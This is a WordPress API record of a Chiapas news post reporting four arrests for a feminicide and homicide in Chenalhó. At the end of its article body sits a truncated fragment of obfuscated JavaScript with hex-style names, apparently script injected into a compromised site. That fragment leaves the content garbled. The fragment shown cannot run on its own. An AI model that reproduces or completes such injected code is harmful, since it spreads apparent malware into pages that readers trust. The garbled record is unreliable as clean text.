{"id":21688,"date":"2025-05-01T04:46:00","date_gmt":"2025-05-01T04:46:00","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=21688"},"modified":"2025-05-01T04:46:00","modified_gmt":"2025-05-01T04:46:00","slug":"detiene-fiscalia-indigena-a-presuntos-responsables-de-feminicidio-y-homicidio-en-chenalho","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=21688","title":{"rendered":"Detiene Fiscal\u00eda Ind\u00edgena a presuntos responsables de feminicidio y homicidio en Chenalh\u00f3"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"720\" height=\"960\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250430-WA0016.jpg\" alt=\"\" class=\"wp-image-21689\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250430-WA0016.jpg 720w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250430-WA0016-225x300.jpg 225w\" sizes=\"auto, (max-width: 720px) 100vw, 720px\" \/><\/figure>\n\n\n\n<p>Yolanda Rodriguez\/ corresponsal<br>SCLC.- La Fiscal\u00eda de Justicia Ind\u00edgena cumpliment\u00f3 cuatro \u00f3rdenes de aprehensi\u00f3n contra personas acusadas de feminicidio, homicidio calificado y lesiones, tras los hechos ocurridos el pasado 16 de febrero en la comunidad Miguel Utrilla \u201cLos Chorros\u201d, en Chenalh\u00f3, Chiapas.<\/p>\n\n\n\n<p>En el enfrentamiento murieron Juana y Diego \u201cN\u201d y cuatro personas m\u00e1s resultaron gravemente heridas.<\/p>\n\n\n\n<p>Los detenidos Elena \u201cN\u201d, Rosa \u201cN\u201d, Filiberto \u201cN\u201d y Raymundo \u201cN fueron trasladados a San Crist\u00f3bal de Las Casas y puestos a disposici\u00f3n de las autoridades.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Yolanda Rodriguez\/ corresponsalSCLC.- La Fiscal\u00eda de Justicia Ind\u00edgena cumpliment\u00f3 cuatro \u00f3rdenes de aprehensi\u00f3n contra personas acusadas de feminicidio, homicidio calificado y lesiones, tras los hechos ocurridos el pasado 16 de febrero en la comunidad Miguel Utrilla \u201cLos Chorros\u201d, en Chenalh\u00f3, Chiapas. En el enfrentamiento murieron Juana y Diego \u201cN\u201d y cuatro personas m\u00e1s resultaron gravemente &hellip;<\/p>\n","protected":false},"author":2,"featured_media":21689,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-21688","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/21688","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=21688"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/21688\/revisions"}],"predecessor-version":[{"id":21690,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/21688\/revisions\/21690"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/21689"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=21688"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=21688"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=21688"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}